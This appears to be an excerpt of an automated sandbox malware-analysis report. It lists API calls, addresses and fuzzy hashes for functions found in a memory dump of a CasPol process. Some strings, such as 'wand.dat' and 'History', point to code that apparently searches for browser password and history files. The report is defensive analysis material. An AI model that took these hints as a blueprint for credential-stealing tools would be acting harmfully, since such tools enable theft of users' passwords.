                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                              • String ID: \StringFileInfo\
                                                                                                                                                              • API String ID: 102104167-2245444037
                                                                                                                                                              • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                              • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                              APIs
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??3@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                                              • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                              • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                              • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                              • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _memicmpwcslen
                                                                                                                                                              • String ID: @@@@$History
                                                                                                                                                              • API String ID: 1872909662-685208920
                                                                                                                                                              • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                              • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                              • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                              • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004100FB
                                                                                                                                                              • memset.MSVCRT ref: 00410112
                                                                                                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                              • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                              • String ID: </%s>
                                                                                                                                                              • API String ID: 3400436232-259020660
                                                                                                                                                              • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                              • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040D58D
                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                              • String ID: caption
                                                                                                                                                              • API String ID: 1523050162-4135340389
                                                                                                                                                              • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                              • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                              • String ID: MS Sans Serif
                                                                                                                                                              • API String ID: 210187428-168460110
                                                                                                                                                              • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                              • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                              • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                              • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                                                              • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memcmp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3384217055-0
                                                                                                                                                              • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                              • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                              • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                              • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$memcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 368790112-0
                                                                                                                                                              • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                              • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                              • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                              • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040560C
                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                              • String ID: *.*$dat$wand.dat
                                                                                                                                                              • API String ID: 2618321458-1828844352
                                                                                                                                                              • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                              • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                              • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                              • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00412057
                                                                                                                                                                • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                              • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                              • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                              • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3550944819-0
                                                                                                                                                              • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                              • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                              • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                              • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                              APIs
                                                                                                                                                              • free.MSVCRT ref: 0040F561
                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$free
                                                                                                                                                              • String ID: g4@
                                                                                                                                                              • API String ID: 2888793982-2133833424
                                                                                                                                                              • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                              • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy
                                                                                                                                                              • String ID: @
                                                                                                                                                              • API String ID: 3510742995-2766056989
                                                                                                                                                              • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                              • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                              • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                              • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004144E7
                                                                                                                                                                • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                              • memset.MSVCRT ref: 0041451A
                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1127616056-0
                                                                                                                                                              • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                              • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                              • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                              • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                              APIs
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                              • malloc.MSVCRT ref: 00417459
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                                                                                              • free.MSVCRT ref: 0041747F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2605342592-0
                                                                                                                                                              • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                              • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                              • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                              • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                              • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                              • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2678498856-0
                                                                                                                                                              • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                              • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                              • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                              • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                              • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                              • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Item
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3888421826-0
                                                                                                                                                              • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                              • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                              • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                              • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00417B7B
                                                                                                                                                              • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                              • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3727323765-0
                                                                                                                                                              • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                              • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                              • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                              • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040F673
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                              • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2754987064-0
                                                                                                                                                              • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                              • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                              • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2754987064-0
                                                                                                                                                              • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                              • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                              • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 764393265-0
                                                                                                                                                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                              APIs
                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
